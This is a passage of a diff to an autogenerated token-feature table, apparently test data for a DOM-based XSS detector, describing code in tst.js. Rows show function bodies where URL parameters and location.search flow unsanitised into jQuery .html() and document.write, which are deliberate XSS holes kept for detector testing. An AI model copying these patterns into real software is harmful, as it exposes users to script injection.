    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | exceptional return of new URL ... ing(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | exceptional return of new URL ... ing(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | new URL ... ing(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | new URL ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | new URL ... ing(1)) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | new URL ... ing(1)) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:22:20:61 | new URL ... ing(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:26:20:40 | URLSearchParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:26:20:40 | URLSearchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:20:26:20:40 | URLSearchParams | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:26:20:40 | URLSearchParams | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:26:20:40 | URLSearchParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:47 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:47 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:47 | target | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:47 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:47 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:57 | target.substring | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:57 | target.substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:57 | target.substring | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:57 | target.substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:57 | target.substring | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | exceptional return of target.substring(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | exceptional return of target.substring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | exceptional return of target.substring(1) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | exceptional return of target.substring(1) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | exceptional return of target.substring(1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | target.substring(1) | CalleeFlexibleAccessPath | URLSearchParams | | autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | target.substring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | target.substring(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16051,6 +112213,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | target.substring(1) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | target.substring(1) | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:20:42:20:60 | target.substring(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:20:49:20:57 | substring | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:20:49:20:57 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:20:49:20:57 | substring | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:20:49:20:57 | substring | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:20:49:20:57 | substring | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:20:59:20:59 | 1 | CalleeFlexibleAccessPath | target.substring | | autogenerated/Xss/DomBasedXss/tst.js:20:59:20:59 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:20:59:20:59 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16059,6 +112226,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:20:59:20:59 | 1 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:20:59:20:59 | 1 | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:20:59:20:59 | 1 | receiverName | target | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:3 | $ | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | $('name') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | $('name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | $('name') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | exceptional return of $('name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | exceptional return of $('name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | exceptional return of $('name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | exceptional return of $('name') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:11 | exceptional return of $('name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:16 | $('name').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:16 | $('name').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:16 | $('name').html | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:16 | $('name').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:16 | $('name').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | $('name ... name')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | $('name ... name')) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | $('name ... name')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | $('name ... name')) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | exceptional return of $('name ... name')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | exceptional return of $('name ... name')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | exceptional return of $('name ... name')) | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | exceptional return of $('name ... name')) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:3:21:42 | exceptional return of $('name ... name')) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:21:5:21:10 | 'name' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:21:5:21:10 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:21:5:21:10 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16066,6 +112263,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:21:5:21:10 | 'name' | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:21:5:21:10 | 'name' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:21:5:21:10 | 'name' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:13:21:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:13:21:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:13:21:16 | html | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:13:21:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:13:21:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:29 | searchParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:29 | searchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:29 | searchParams | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:29 | searchParams | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:29 | searchParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:33 | searchParams.get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:33 | searchParams.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:33 | searchParams.get | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:33 | searchParams.get | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:33 | searchParams.get | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | exceptional return of searchP ... 'name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | exceptional return of searchP ... 'name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | exceptional return of searchP ... 'name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | exceptional return of searchP ... 'name') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | exceptional return of searchP ... 'name') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | searchP ... 'name') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | searchP ... 'name') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | searchP ... 'name') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16073,6 +112290,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | searchP ... 'name') | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | | autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | searchP ... 'name') | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:21:18:21:41 | searchP ... 'name') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:21:31:21:33 | get | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:21:31:21:33 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:21:31:21:33 | get | enclosingFunctionBody | target document location search $ myId html target document write document write $
    $
    $
